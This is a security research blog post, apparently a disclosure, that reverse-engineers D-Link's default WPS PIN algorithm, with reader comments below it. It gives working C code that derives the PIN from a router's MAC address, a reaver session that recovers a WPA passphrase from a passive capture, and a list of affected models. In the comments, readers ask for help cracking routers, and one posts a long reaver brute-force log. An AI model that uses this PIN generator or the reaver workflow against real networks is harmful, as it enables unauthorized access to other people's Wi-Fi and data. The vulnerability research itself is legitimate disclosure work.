Reversing D-Link’s WPS Pin Algorithm

While perusing the latest firmware for D-Link’s DIR-810L 802.11ac router, I found an interesting bit of code in sbin/ncc, a binary which provides back-end services used by many other processes on the device, including the HTTP and UPnP servers:

Call to sub_4D56F8 from getWPSPinCode

I first began examining this particular piece of code with the hopes of controlling part of the format string that is passed to __system. However, this data proved not to be user controllable, as the value placed in the format string is the default WPS pin for the router.

The default WPS pin itself is retrieved via a call to sub_4D56F8. Since the WPS pin is typically programmed into NVRAM at the factory, one might expect sub_4D56F8 to simply be performing some NVRAM queries, but that is not the case:

The beginning of sub_4D56F8

This code isn’t retrieving a WPS pin at all, but instead is grabbing the router’s WAN MAC address. The MAC address is then split into its OUI and NIC components, and a tedious set of multiplications, xors, and shifts ensues (full disassembly listing here):

Break out the MAC and start munging the NIC

While the math being performed is not complicated, determining the original programmer’s intent is not necessarily straightforward due to the assembly generated by the compiler. Take the following instruction sequence for example:

li $v0, 0x38E38E39
multu $a3, $v0
...
mfhi $v0
srl $v0, 1

Directly converted into C, this reads:

v0 = (((unsigned long long) a3 * 0x38E38E39) >> 32) >> 1;

Which is just a fancy way of dividing by 9:

v0 = a3 / 9;

Likewise, most multiplication and modulus operations are also performed by various sequences of shifts, additions, and subtractions. The multu assembly instruction is only used for the above example where the high 32 bits of a product are needed, and there is nary a divu in sight.
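A way to confirm that a suspected reciprocal constant really is a division, shown here as an added example that is not part of the original post: it emulates the multu/mfhi/srl sequence above, derives the constant for a divisor of 9, and compares the result with real division across the 32-bit range. The function names are made up for this example.

```c
#include <stdint.h>
#include <stdio.h>

/* Emulates the sequence above:
 *   li $v0,0x38E38E39 ; multu $a3,$v0 ; mfhi $v0 ; srl $v0,1 */
static uint32_t div9_mips(uint32_t a3)
{
    uint64_t product = (uint64_t)a3 * 0x38E38E39u; /* multu: 64-bit HI:LO */
    uint32_t hi = (uint32_t)(product >> 32);       /* mfhi: upper 32 bits */
    return hi >> 1;                                /* srl $v0, 1 */
}

/* Constant a compiler uses for "n / d" with a post-shift:
 * ceil(2^(32+shift) / d). */
static uint64_t reciprocal_magic(uint32_t d, unsigned shift)
{
    return ((1ULL << (32 + shift)) + d - 1) / d;
}

/* Compare against real division at edge values and on a strided sweep of
 * the 32-bit range, probing both sides of each sampled multiple of 9. */
static unsigned long count_mismatches(void)
{
    static const uint32_t edges[] = { 0, 1, 8, 9, 10, 0x7FFFFFFFu, 0x80000000u,
                                      0xFFFFFFFBu, 0xFFFFFFFCu, 0xFFFFFFFFu };
    unsigned long bad = 0;
    size_t i;
    uint64_t n;

    for (i = 0; i < sizeof(edges) / sizeof(edges[0]); i++)
        bad += (div9_mips(edges[i]) != edges[i] / 9);

    for (n = 9; n <= 0xFFFFFFFFull; n += 65521) {
        uint32_t m = (uint32_t)(n - n % 9); /* multiple of 9 at or below n */
        bad += (div9_mips(m) != m / 9);
        bad += (div9_mips(m - 1) != (m - 1) / 9);
        bad += (div9_mips((uint32_t)n) != (uint32_t)n / 9);
    }
    return bad;
}

int main(void)
{
    printf("magic for /9 with srl 1: 0x%llX\n",
           (unsigned long long)reciprocal_magic(9, 1));
    printf("mismatches: %lu\n", count_mismatches());
    return 0;
}
```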

However, after translating the entire sub_4D56F8 disassembly listing into a more palatable format, it’s obvious that this code is using a simple algorithm to generate the default WPS pin entirely from the NIC portion of the device’s WAN MAC address:

unsigned int generate_default_pin(char *buf)
{
    char *mac;
    char mac_address[32] = { 0 };
    unsigned int oui, nic, pin;

    /* Get a pointer to the WAN MAC address */
    mac = lockAndGetInfo_log()->wan_mac_address;

    /* 
     * Create a local, NULL-terminated copy of the WAN MAC (simplified from
     * the original code's sprintf/memmove loop).
     */
    sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
                                                     mac[1],
                                                     mac[2],
                                                     mac[3],
                                                     mac[4],
                                                     mac[5],
                                                     mac[6],
                                                     mac[7],
                                                     mac[8],
                                                     mac[9],
                                                     mac[10],
                                                     mac[11]);

    /* 
     * Convert the OUI and NIC portions of the MAC address to integer values.
     * OUI is unused, just need the NIC.
     */
    sscanf(mac_address, "%06X%06X", &oui, &nic);

    /* Do some XOR munging of the NIC. */
    pin = (nic ^ 0x55AA55);
    pin = pin ^ (((pin & 0x0F) << 4) +
                 ((pin & 0x0F) << 8) +
                 ((pin & 0x0F) << 12) +
                 ((pin & 0x0F) << 16) +
                 ((pin & 0x0F) << 20));
 
    /*
     * The largest possible remainder for any value divided by 10,000,000
     * is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
     */
    pin = pin % 10000000;
 
    /* The pin needs to be at least 7 digits long */
    if(pin < 1000000)
    {
        /*
         * The largest possible remainder for any value divided by 9 is
         * 8; hence this adds at most 9,000,000 to the pin value, and at
         * least 1,000,000. This guarantees that the pin will be 7 digits
         * long, and also means that it won't start with a 0.
         */
        pin += ((pin % 9) * 1000000) + 1000000;
    }
 
    /*
     * The final 8 digit pin is the 7 digit value just computed, plus a
     * checksum digit. Note that in the disassembly, the wps_pin_checksum
     * function is inlined (it's just the standard WPS checksum implementation).
     */
    pin = ((pin * 10) + wps_pin_checksum(pin));

    sprintf(buf, "%08u", pin);
    return pin;
}

Since the BSSID is only off-by-one from the WAN MAC, we can easily calculate any DIR-810L’s WPS pin just from a passive packet capture:

$ sudo airodump-ng mon0 -c 4

 CH  4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1 
                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                    
C0:A0:BB:EF:B3:D6  -13   0        6        0    0   4  54e  WPA2 CCMP   PSK  dlink-B3D6 

$ ./pingen C0:A0:BB:EF:B3:D7   # <--- WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: '99767389'
[+] WPA PSK: 'hluig79268'
[+] AP SSID: 'dlink-B3D6'

But the DIR-810L isn’t the only device to use this algorithm. In fact, it appears to have been in use for some time, dating all the way back to 2007 when WPS was first introduced. The following is an – I’m sure – incomplete list of affected and unaffected devices:

Confirmed Affected:

  1. DIR-810L
  2. DIR-826L
  3. DIR-632
  4. DHP-1320
  5. DIR-835
  6. DIR-615 revs: B2, C1, E1, E3
  7. DIR-657
  8. DIR-827
  9. DIR-857
  10. DIR-451
  11. DIR-655 revs: A3, A4, B1
  12. DIR-825 revs: A1, B1
  13. DIR-651
  14. DIR-855
  15. DIR-628
  16. DGL-4500
  17. DIR-601 revs: A1, B1
  18. DIR-836L
  19. DIR-808L
  20. DIR-636L
  21. DAP-1350
  22. DAP-1555

Confirmed Unaffected:

  1. DIR-815
  2. DIR-505L
  3. DIR-300
  4. DIR-850L
  5. DIR-412
  6. DIR-600
  7. DIR-685
  8. DIR-817LW
  9. DIR-818LW
  10. DIR-803
  11. DIR-845L
  12. DIR-816L
  13. DIR-860L
  14. DIR-645
  15. DIR-685
  16. DAP-1522

Some affected devices, like the DIR-810L, generate the WPS pin from the WAN MAC; most generate it from the BSSID. A stand-alone tool implementing this algorithm can be found here, and has already been rolled into the latest Reaver Pro.
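For owners who want to know whether their own unit is affected, the following added example (not the author's stand-alone tool and not D-Link code) checks whether the MAC and default PIN printed on a device label are related by the algorithm above. It assumes the label MAC may be either the BSSID or the WAN MAC, so it also tries the addresses one above and one below; `parse_mac` and `audit_label` are names made up for this example.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Standard WPS checksum digit for the 7-digit body of a PIN. */
static unsigned wps_pin_checksum(uint32_t pin7)
{
    unsigned accum = 0, weight = 3;
    for (; pin7; pin7 /= 10, weight ^= 2)   /* weight alternates 3,1,3,... */
        accum += weight * (pin7 % 10);
    return (10 - accum % 10) % 10;
}

/* The derivation described above, applied to the 24-bit NIC of a MAC. */
static uint32_t dlink_default_pin(uint32_t nic)
{
    uint32_t pin = (nic & 0xFFFFFF) ^ 0x55AA55;
    uint32_t low = pin & 0x0F;

    pin ^= (low << 4) + (low << 8) + (low << 12) + (low << 16) + (low << 20);
    pin %= 10000000;
    if (pin < 1000000)
        pin += ((pin % 9) * 1000000) + 1000000;
    return pin * 10 + wps_pin_checksum(pin);
}

/* Accepts 12 hex digits with optional ':' or '-' separators. 0 on success. */
static int parse_mac(const char *s, uint64_t *mac)
{
    uint64_t v = 0;
    int digits = 0;

    for (; *s; s++) {
        int c = tolower((unsigned char)*s);
        if (c == ':' || c == '-')
            continue;
        if (!isxdigit(c) || ++digits > 12)
            return -1;
        v = (v << 4) | (uint64_t)(c <= '9' ? c - '0' : c - 'a' + 10);
    }
    if (digits != 12)
        return -1;
    *mac = v;
    return 0;
}

/* Returns 1 if the label PIN is derivable from the label MAC (the offset of
 * the matching address is stored in *offset), 0 if it is not, and -1 if
 * either input is malformed. Trying offsets +1/-1 is this example's
 * assumption about which interface's MAC is printed on the label. */
static int audit_label(const char *mac_str, const char *pin_str, int *offset)
{
    static const int offsets[] = { 0, 1, -1 };
    uint64_t mac;
    uint32_t pin = 0;
    size_t i;

    if (parse_mac(mac_str, &mac) != 0 || strlen(pin_str) != 8)
        return -1;
    for (i = 0; i < 8; i++) {
        if (!isdigit((unsigned char)pin_str[i]))
            return -1;
        pin = pin * 10 + (uint32_t)(pin_str[i] - '0');
    }
    if (wps_pin_checksum(pin / 10) != pin % 10)
        return -1;                          /* not a well-formed WPS PIN */

    for (i = 0; i < sizeof(offsets) / sizeof(offsets[0]); i++) {
        /* Hex add/subtract with carry, wrapped to the 24-bit NIC. */
        uint32_t nic = (uint32_t)((mac + (uint64_t)(int64_t)offsets[i]) & 0xFFFFFF);
        if (dlink_default_pin(nic) == pin) {
            *offset = offsets[i];
            return 1;
        }
    }
    return 0;
}

int main(void)
{
    int off = 0;
    /* BSSID and PIN taken from the capture shown earlier in the post. */
    int r = audit_label("C0:A0:BB:EF:B3:D6", "99767389", &off);

    if (r == 1)
        printf("PIN is derivable from label MAC%+d: disable WPS\n", off);
    else
        printf("%s\n", r == 0 ? "PIN not derived by this algorithm" : "bad input");
    return 0;
}
```

A result of 1 means the default PIN offers no secrecy beyond the MAC address, so WPS should be explicitly disabled on that unit.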

55 Responses to Reversing D-Link’s WPS Pin Algorithm

  1. shutin says:

    Great work! So if I understand correctly.. Instead of generating a random PIN at the factory and putting that in NVRAM, they use some code to generate a calculable PIN from the MAC, and put *that* in NVRAM? Whyyyyy? So if you completely wipe NVRAM and then reinstall factory software the number printed on the bottom of the unit is still viable?

    Makes you wonder how many other routers have a similar method, since they all need to be able to retrieve that printed PIN on the bottom somehow.

    This is why I’ll never buy a consumer router again. I went to pfSense on a dedicated computer and have never looked back.

    • Craig says:

      they use some code to generate a calculable PIN from the MAC, and put *that* in NVRAM?

      Correct.

      Whyyyyy?

      Ha, good question. Likely convenience, laziness, or a bit of both.

      So if you completely wipe NVRAM and then reinstall factory software the number printed on the bottom of the unit is still viable?

      Based on the code I’ve seen, yes, the device can still restore its default pin even if you’ve wiped NVRAM. Haven’t tested that myself though.

      Makes you wonder how many other routers have a similar method

      WPS pins generated from MAC addresses are not new; several other devices/vendors have been caught doing it in the past.

    • Fghjkutr says:

      What sane person has WPS enabled anyway?

  2. Anon says:

    Hate to be the tinfoil hat wearer, but this is exactly the kind of “backdoor” enabling bug that the feds like.

  3. ternarybit says:

    I was examining the default configs on AT&T U-Verse modem/routers some time ago, and found the device’s serial number is just the decimal version of the unit’s BSSID. The ESSID is ATT### where ### is the last three digits of the serial number–they’re everywhere.

    Since the default PSK is a 10-digit decimal number, I suspected it must be derived somehow from the WAN MAC or BSSID. This post has reawakened my curiosity about this. Awesome work Craig.

  6. M says:

    What decompiler is that for MIPS?

  7. Ulvi says:

    Great work. Unfortunately I couldn’t catch any dlink APs to try this.

    • Craig says:

      Search Google and Ebay for people who have taken pictures of the bottoms of their D-Links; there’s usually a sticker on the bottom that shows both the MAC address and the default WPS pin. You can plug the MAC address into the algorithm and see if the same WPS pin pops out. 🙂

  12. Amihai says:

    that is the worst implementation to the worst protocol ever

  13. Special_K says:

    Hi. Great discovery!

    What do I do if my MAC doesn’t end with a number?
    How do I count up?

    For Example: XX:XX:XX:XX:ED:FD ? thanks in advance

  14. Dan says:

    Do those models come with WPS enabled by default?

  16. Anonymous says:

    Very interesting read (as always on this site), thanks for sharing.
    My router is a Zyxel P-2601HN and Mediatek provides the source code for its Ralink drivers for downloading, I found this code snippet in there. (http://cdn-cw.mediatek.com/Downloads/linux/DPO_RT5572_LinuxSTA_2.6.1.3_20121022.tar.bz2).

    Luckily, my ISP does not open WPS by default. There is a physical button to press on the device when WPS is needed.

    I was wondering if the WPA2PSK passphrase were also generated from the MAC address?


    INT ComputeChecksum(
        IN UINT PIN)
    {
        INT digit_s;
        UINT accum = 0;

        PIN *= 10;
        accum += 3 * ((PIN / 10000000) % 10);
        accum += 1 * ((PIN / 1000000) % 10);
        accum += 3 * ((PIN / 100000) % 10);
        accum += 1 * ((PIN / 10000) % 10);
        accum += 3 * ((PIN / 1000) % 10);
        accum += 1 * ((PIN / 100) % 10);
        accum += 3 * ((PIN / 10) % 10);

        digit_s = (accum % 10);
        return ((10 - digit_s) % 10);
    } /* ComputeChecksum*/

    UINT GenerateWpsPinCode(
        IN PRTMP_ADAPTER pAd,
        IN BOOLEAN bFromApcli,
        IN UCHAR apidx)
    {
        UCHAR macAddr[MAC_ADDR_LEN];
        UINT iPin;
        UINT checksum;

        NdisZeroMemory(macAddr, MAC_ADDR_LEN);

    #ifdef CONFIG_STA_SUPPORT
        IF_DEV_CONFIG_OPMODE_ON_STA(pAd)
            NdisMoveMemory(&macAddr[0], pAd->CurrentAddress, MAC_ADDR_LEN);
    #endif /* CONFIG_STA_SUPPORT */

        iPin = macAddr[3] * 256 * 256 + macAddr[4] * 256 + macAddr[5];

        iPin = iPin % 10000000;

        checksum = ComputeChecksum( iPin );
        iPin = iPin*10 + checksum;

        return iPin;
    }

    • Craig says:

      Yes, based on that code it appears to be generating a pin from the system’s MAC address (probably the LAN/BSSID MAC). You’ll probably want to verify that against an actual device though.

      Are you sure WPS isn’t enabled by default? Just because it has a push button doesn’t mean WPS isn’t open (all WPS enabled routers have a push button); in fact, the push button typically won’t work at all if WPS has been disabled, which is why just about every vendor/ISP leaves WPS enabled by default (user convenience). I’d check the device’s configuration settings and make sure WPS is explicitly disabled.

      • Anonymous says:

        The pin code matches the last 3 bytes of the mac address on my router (I did not bother to verify the checksum digit though).

        Also, WPS is disabled in my setup, and I think it is disabled by default, but I can remember for sure. The web admin interface confirms WPS is off and my Wireshark captures as well (the beacon frame shows a Microsoft WPS extension if WPS is available).

        I also verified that the beacon frames coming from some neighbors at the same ISP do not offer WPS.

        It could still be in theory that the router accepts a WPS authentication even though its beacon frames do not advertise for it. This would not be the first security hole this device has to offer. I am quite tempted to try that. That would mean free wifi for me in the whole country ;), let alone all the security/privacy implications this would have.

  20. kcdtv says:

    It seems that DIR-601 v2 is affected
    http://pix.toile-libre.org/upload/original/1415501783.png
    while the 601 v1 seems not to have WPS
    http://support.dlink.com/emulators/dir601/100NA/support_internet.html#Wireless

    Thanks Craig for sharing with us this very nice piece of reverse engineering.

  21. DK says:

    So what’s

    Default pin of this router’s mac?

    xx:xx:xx:0D:5B:4A

    I am not sure which model is this

    6C:19:8F

  22. Scott says:

    Router manufacturers REALLY need to subject their firmware developers to third-party code reviews. Or even code reviews. Heck, things would be loads better if they just assigned a QA person to test around their code. The context here is security, but there’s other context to worry about like network abuse.

    Good luck trying to notify D-Link security officers about this; you’ll have to talk your way past Mumbai support first.

    I worked on a DDNS provider’s update server for many years. A majority of the DDNS abuse traffic came from D-Link. Far more than from Linksys, etc. D-Link developers would allow end users to “enable” DDNS, and then SAVE even if domain, username and password were blank. They would also automatically retry failed credentials forever, as if the server might somehow get exhausted and accept bad credentials. You could try to block D-link’s user Agent, but then they would do things like put random text into the Agent String to escape blocking. There was also some incident years ago where D-Link firmware would DDOS public NTP servers.

    These people are clearly not network enthusiasts. If you want to pick out their faults, your blog will be busy for a long time…

  23. Kartik says:

    Hey, can you please tell me how to run your script and get the PINs? I do not know how to use that algorithm, so kindly help me.

  24. Rsc says:

    Wow, amazing stuff really.

    I’m wondering if it’s the case for some of the Tp-link routers as well. Is this something you would be interested in researching in the future?

  25. Alex says:

    Does anyone know where to find or how to generate just the full list of all possible wps pins as a text file?

  26. qwerty says:

    How can I run the script???
    Please, help me

  34. mayo says:

    Hi… has anyone tried the DIR615 G/H version? Has anyone successfully cracked the pin?

  36. rekoon says:

    plz I want a text file with every pin code in it, like this,
    and
    I want to guess automatically

    00000001
    34324243
    44434344
    32323232
    32454545
    11231231
    34324324

  37. mark says:

    Can you help me with this D-Link DSL 2740?
    I have a problem with AP limit, WPS lock.
    I have tried with mdk3 to unlock….


    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: f1:49:76:9e:72:22:88:29:c5:81:70:c8:e8:73:43:6a

    [P] PKR: 28:66:f4:63:4b:f0:69:9a:3e:b5:b5:98:9d:45:41:51:45:30:6b:18:0a:28:b1:81:b5:fa:15:96:18:20:fc:8f:76:06:bb:7f:56:3e:4f:f2:93:fc:85:57:3d:db:58:82:7d:2f:64:01:b8:d3:f3:3c:5c:1a:06:3c:d5:fc:a7:ab:14:05:83:10:4e:0c:62:04:20:58:bb:24:12:df:e4:6f:91:f3:91:5d:a4:79:71:f3:7f:cf:90:0d:a7:94:aa:95:f5:fa:04:40:9a:39:83:8d:ba:49:c0:92:4a:c2:bd:df:d4:57:34:8b:20:ac:3f:fd:32:29:b8:15:05:8d:7f:af:d2:e7:4b:55:f4:c8:9e:c4:e3:fe:9d:ca:12:58:76:43:da:cb:c6:70:c1:6a:d9:a2:c5:fe:40:04:0b:1f:38:58:0b:e3:09:ae:3d:fb:79:1e:98:9b:eb:bc:a9:3b:c6:d9:fd:6c:ff:d8:3d:a8:38:e9:b2:b1:31:71:6a:5a:66:a1

    [P] AuthKey: e5:9c:4e:dd:28:b8:7b:f3:89:8e:da:10:a2:8f:9d:2f:76:74:80:85:09:7b:4e:52:66:84:3e:e2:31:a3:76:bd

    [+] Sending M2 message

    [P] E-Hash1: c3:b0:c6:9e:e0:88:e0:67:cc:59:d3:07:a5:24:72:c7:02:e0:78:6f:0b:87:80:df:24:ad:41:e4:ed:f3:1e:d2

    [P] E-Hash2: 11:71:79:af:79:21:52:ef:02:7a:ca:6d:29:78:a6:e8:27:c2:f7:33:67:cb:fb:e6:57:25:43:43:fd:20:c8:20

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 64

    [+] Pin count advanced: 10064. Max pin attempts: 11000

    [+] Trying pin 43210558.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 09:b1:04:63:2d:de:a1:15:ff:59:09:89:ac:2a:ef:ef

    [P] PKE: 23:a2:70:73:f8:70:30:ce:f3:36:e5:c1:ab:fe:17:7f:a2:35:2b:5a:48:ae:30:de:ab:9a:8c:10:80:f4:5b:b3:1f:39:05:88:e1:57:79:44:ed:48:84:41:fc:4e:30:5c:89:13:bb:a6:e9:d7:11:41:b7:9a:66:ed:5b:e0:7e:ed:bc:b6:13:e1:ec:83:e4:e7:2f:18:b8:28:59:00:90:5b:8a:46:27:eb:ff:9a:be:16:2f:d8:34:9e:83:3e:16:7b:35:33:87:61:89:14:16:c3:86:b9:5c:ca:64:8b:f3:85:8c:77:5d:fe:0c:37:f0:b2:93:dc:e9:10:e7:48:d9:c0:b2:ee:bf:13:14:d6:57:53:e4:a8:5a:6c:34:08:de:30:35:b8:ce:b9:98:cf:c3:4f:37:e3:97:a9:14:b4:d1:93:d5:37:6e:d5:9f:5e:05:ee:21:6e:8e:6c:04:3e:a8:a4:c7:d1:73:69:5a:e2:16:88:57:e2:5d:c0:36:7e:c3:5b

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: fd:d0:db:6e:65:a2:a9:a9:18:07:2d:42:49:60:76:b9

    [P] PKR: b7:b8:77:0b:8b:47:7d:8b:ef:73:31:b3:12:30:4d:07:8a:a3:92:c8:16:47:32:f5:57:ce:d8:6a:1d:65:47:b4:fb:06:24:fd:fe:f9:75:c5:e5:45:82:b2:eb:f6:85:9f:58:0a:aa:14:24:f5:3d:db:96:bb:ab:a9:64:ca:85:0d:8b:4b:cc:07:ba:b3:0d:24:ed:c6:57:e8:e8:16:0b:74:05:da:90:6b:17:00:71:6b:c2:e8:86:d5:a3:1e:ce:70:b5:ff:13:43:90:82:f3:39:c1:53:9b:f2:9d:a5:0a:43:1f:98:d2:c5:30:c5:8c:6d:26:7c:34:69:1b:ef:51:0d:01:31:48:5a:96:b4:ed:1d:b7:ad:8e:5d:fd:70:bd:b1:d5:b7:1f:12:71:26:21:28:7d:05:bf:32:d2:a5:ee:28:b3:17:49:9f:45:33:b1:a1:06:7d:a2:65:67:65:9d:94:e1:0b:54:af:80:fc:54:a8:5f:ec:9f:13:0d:40:89:34

    [P] AuthKey: 4f:8d:a0:d4:eb:89:35:6f:27:16:ae:ec:fa:2f:4c:f9:d4:98:28:1d:9b:59:a9:7e:3a:9f:01:5c:fe:07:04:bc

    [+] Sending M2 message

    [P] E-Hash1: b5:e5:6a:1d:95:eb:66:ec:7e:79:ea:f3:81:3c:09:b8:20:1d:99:cd:ba:4a:13:b8:33:d2:6e:4d:9c:cb:58:e3

    [P] E-Hash2: 14:db:df:ff:3f:0f:f3:43:0e:a8:2a:4e:91:14:37:be:82:27:06:0a:4d:f8:b6:f3:dc:ce:08:9f:82:41:f0:74

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 65

    [+] Pin count advanced: 10065. Max pin attempts: 11000

    [+] Trying pin 43210565.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: 4b:31:04:9e:6f:58:b4:9f:de:ba:26:91:0e:94:48:e9

    [P] PKE: eb:a4:84:36:61:72:9f:11:c6:9a:41:dc:ac:db:d6:1b:a3:77:83:06:60:bb:5c:b8:b7:d7:c2:db:a8:ec:68:bb:8f:2a:83:be:fd:78:1c:7b:6f:1a:ed:1d:a7:f6:3f:ad:6f:33:fd:4d:67:d6:62:ad:3c:cf:c8:97:2d:45:4c:94:87:fb:d1:10:e9:9f:78:c2:ab:3b:36:73:5c:13:d4:15:1c:88:86:89:31:91:58:ae:50:ee:bb:50:1c:8e:14:14:6d:96:b3:7b:2d:04:5f:83:77:1e:13:5e:9f:93:6e:ef:16:52:9b:ee:4d:73:1e:cf:05:3d:18:92:08:4e:ae:a8:dd:15:14:a2:03:c7:ad:82:c6:3f:fb:83:ed:20:0b:61:09:9a:34:0a:2c:2b:85:3f:e0:0a:ee:9b:ea:f8:97:87:a2:a6:b8:61:ca:fd:ad:d7:e8:3f:e5:5a:cc:20:48:4e:ea:fd:9c:75:21:15:42:e6:c3:3c:35:da:c4:5e:91:8d

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: 1a:dc:72:81:fc:44:12:1e:9f:ee:8e:5d:b4:f1:70:98

    [P] PKR: ca:2f:d9:11:b8:0e:f0:7f:6d:02:ee:d7:75:cf:d2:49:23:90:14:8d:2f:1b:49:02:fc:9c:e6:fa:c7:63:96:71:38:de:b6:9f:c4:4e:df:75:9b:93:30:89:e1:27:0a:3a:7e:5d:92:f2:2b:9b:4a:27:f9:61:be:c8:d0:0a:26:a4:95:df:ee:8a:d2:eb:eb:5d:fd:94:3b:da:e0:69:a6:01:1c:cd:f8:17:97:61:fa:44:92:4b:1c:dd:87:44:97:f9:0c:fa:88:b0:6a:84:14:0d:18:90:64:43:e7:7e:e2:fa:58:a5:57:74:0b:d6:e2:7d:06:d3:3d:9a:5a:86:84:86:f1:d1:75:7b:f9:ca:6f:1c:3a:93:ee:06:58:cd:b6:c8:76:76:47:7f:ec:95:5f:2f:d5:d4:07:bb:ff:bf:fc:e0:46:83:11:d2:84:15:aa:6e:c0:04:f0:34:dc:60:4d:e8:81:5f:79:cc:f5:89:6a:0a:36:ba:f3:98:6e:e9:46:4b

    [P] AuthKey: 49:29:be:4d:a0:ce:1e:e1:da:87:a6:ff:2f:93:45:01:f8:70:f3:2e:64:6a:61:a5:7d:7c:41:25:84:fd:37:31

    [+] Sending M2 message

    [P] E-Hash1: 78:e8:ba:69:95:a6:0a:20:f2:82:e6:a2:39:01:cf:00:ba:2c:64:99:5f:1e:7b:f9:23:02:d5:86:8e:56:b4:e3

    [P] E-Hash2: 46:b5:b4:6d:2c:6f:13:ff:fb:96:b5:2f:f7:12:15:cb:a0:b7:ab:40:f6:c8:93:bc:75:7c:70:a1:69:33:1d:85

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 66

    [+] Pin count advanced: 10066. Max pin attempts: 11000

    [+] Trying pin 43210572.

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received identity request

    [+] Sending identity response

    [P] E-Nonce: dc:84:3c:8d:64:5e:3f:59:89:57:31:8a:ec:b9:44:bb
    [P] PKE: 21:4f:69:33:fa:be:ef:54:03:cc:a5:77:6f:90:55:8f:a8:c3:32:69:a7:0e:2b:ba:38:92:16:43:e3:75:9e:ac:6e:8f:22:61:fa:33:b0:01:27:2b:54:9a:34:d3:62:7d:ef:24:53:f4:01:ea:c0:b2:43:fa:f4:01:1d:8a:57:6a:2a:cc:08:a6:4b:8e:d1:47:2d:9a:99:a4:e6:e2:3c:71:08:80:0c:be:3b:35:e9:be:4d:7c:d4:18:e2:50:dd:61:46:e2:b6:c3:8d:ba:a4:34:b5:5b:d8:3c:cf:36:49:15:73:b8:41:67:fd:7f:23:ef:dd:b8:bf:bf:82:76:90:a4:70:3c:70:6a:07:33:09:2a:b5:17:e0:8e:5b:2a:5c:73:2a:18:c5:73:54:9e:ab:72:29:69:3c:f9:75:59:b2:df:8c:15:79:cb:8e:98:a7:23:f0:9a:28:8b:1b:64:fa:30:9e:2d:27:1e:5e:05:9f:cf:dc:4d:b9:44:43:44:a7:85

    [P] WPS Manufacturer: Ayecom

    [P] WPS Model Name: AyecomWAP

    [P] WPS Model Number: DSL2740

    [P] Access Point Serial Number: 12345

    [+] Received M1 message

    [P] R-Nonce: cb:ec:a5:d2:d6:74:d9:53:62:90:77:c9:fe:20:82:16

    [P] PKR: 97:b6:a6:ce:b2:00:7c:f0:c0:46:04:57:e5:7c:4d:5c:c3:12:77:17:3e:23:7a:5f:3d:73:a8:3a:f5:b5:7a:d0:b8:70:7e:cf:49:7e:9d:1b:3f:59:81:94:ae:fa:54:97:fe:d7:dc:67:08:b2:bf:fe:bd:4e:50:e3:ba:01:e1:4f:15:ee:e2:04:89:0d:dd:42:40:9a:a5:ef:45:aa:bd:19:21:47:c8:f7:79:fe:07:48:bd:20:b8:a0:82:ca:16:8c:5f:02:7f:fa:7f:ac:28:ba:9c:0c:67:d7:96:7f:62:80:1f:0a:c6:57:7c:ce:04:d3:ac:ed:cd:f7:e1:63:f3:59:5e:ee:38:b2:2b:31:fc:d1:6e:af:9e:71:2f:5a:d9:60:36:65:d4:af:9a:8d:b0:12:5a:f0:fd:a9:90:2c:e4:14:e6:de:bd:a5:19:d1:dd:0d:6b:08:97:c6:28:a4:6c:60:dd:5a:78:d9:40:64:3f:29:2b:d1:fa:4a:a4:6c:09:cb

    [P] AuthKey: fe:d6:e7:24:e3:41:4b:f2:49:87:1e:66:49:9f:95:40:b4:85:72:83:e6:4b:ca:53:51:98:de:73:92:43:1b:00

    [+] Sending M2 message

    [P] E-Hash1: 10:b2:b6:34:44:c2:34:25:54:4b:4e:f0:b9:6f:66:47:a6:22:94:c3:bf:39:03:9b:b5:f2:be:5b:9d:65:21:a8

    [P] E-Hash2: 45:9d:9e:f1:5f:07:96:b1:11:99:8c:56:3f:1e:b0:dd:37:e4:a4:aa:f8:28:6e:7e:9d:24:cc:52:ee:90:ba:c9

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received WSC NACK

    [+] Sending WSC NACK

    [+] p2_index set to 67
    [+] Pin count advanced: 10067. Max pin attempts: 11000
    [+] 91.52% complete. Elapsed time: 0d0h0m43s.
    [+] Estimated Remaining time: 0d1h2m12s
    [+] Trying pin 43210589.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [!] EAP_FAILURE: TERMINATE
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    ^C
    [+] Session saved.
